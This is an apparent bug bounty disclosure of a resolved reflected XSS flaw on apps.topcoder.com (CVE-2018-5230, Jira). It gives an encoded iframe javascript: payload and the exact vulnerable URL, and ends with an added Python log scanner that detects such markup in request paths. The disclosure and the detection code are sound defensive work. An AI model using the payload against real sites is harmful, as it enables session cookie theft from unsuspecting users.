Cross Site Scripting via CVE-2018-5230 on https://apps.topcoder.com
Medium
Lab45
Reported by
n0x496n
Vulnerability Details
Technical details and impact analysis
Hi, I found reflected XSS on https://apps.topcoder.com via an error message.
Payload: `%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm`
Vulnerable link: https://apps.topcoder.com/wiki/labels/%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%22%3E.vm
Steps to reproduce: Create an account and visit the vulnerable URL.
{F693517}
References :
https://www.cvedetails.com/cve/CVE-2018-5230/
https://www.exploit-db.com/exploits/37791
Best regards.
## Impact
Hackers can steal victim's cookies.
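
A defender-side check for the request pattern in this report, as an added example that is not part of the original report: it scans access-log lines for requests under `/wiki/labels/` whose percent-decoded path contains HTML markup or a `javascript:` URI, including double-encoded variants. The log lines, client addresses, timestamps and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined log format); addresses and times are made up.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2020:10:00:00 +0000] "GET /wiki/labels/'
    '%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm HTTP/1.1" 404 512',
    '198.51.100.8 - - [01/Jan/2020:10:00:05 +0000] "GET /wiki/labels/release-notes HTTP/1.1" 200 2048',
    '198.51.100.9 - - [01/Jan/2020:10:00:09 +0000] "GET /wiki/labels/%253Cscript%253E.vm HTTP/1.1" 404 512',
    '198.51.100.8 - - [01/Jan/2020:10:00:12 +0000] "GET /wiki/labels/c%2B%2B HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# An opening or closing tag, or a javascript: URI, anywhere in the decoded path.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-z!]|javascript\s*:', re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup (%253C) is also exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_paths(lines, prefix="/wiki/labels/"):
    """Return (client_ip, decoded_path) for requests under prefix that carry markup."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path = match.group(1).split("?", 1)[0]  # only the path is inspected here
        if not path.startswith(prefix):
            continue
        decoded = fully_decode(path)
        if MARKUP_RE.search(decoded):
            hits.append((line.split()[0], decoded))
    return hits


if __name__ == "__main__":
    for ip, path in suspicious_paths(SAMPLE_LOG):
        print(f"{ip} requested markup in path: {path!r}")
```

Hits on this pattern show that markup was sent in the URL, not that it was reflected unescaped; confirming that requires checking how the error page encodes the echoed path.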
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2018-5230
UNKNOWN
The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom …
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
Cross-site Scripting (XSS) - Reflected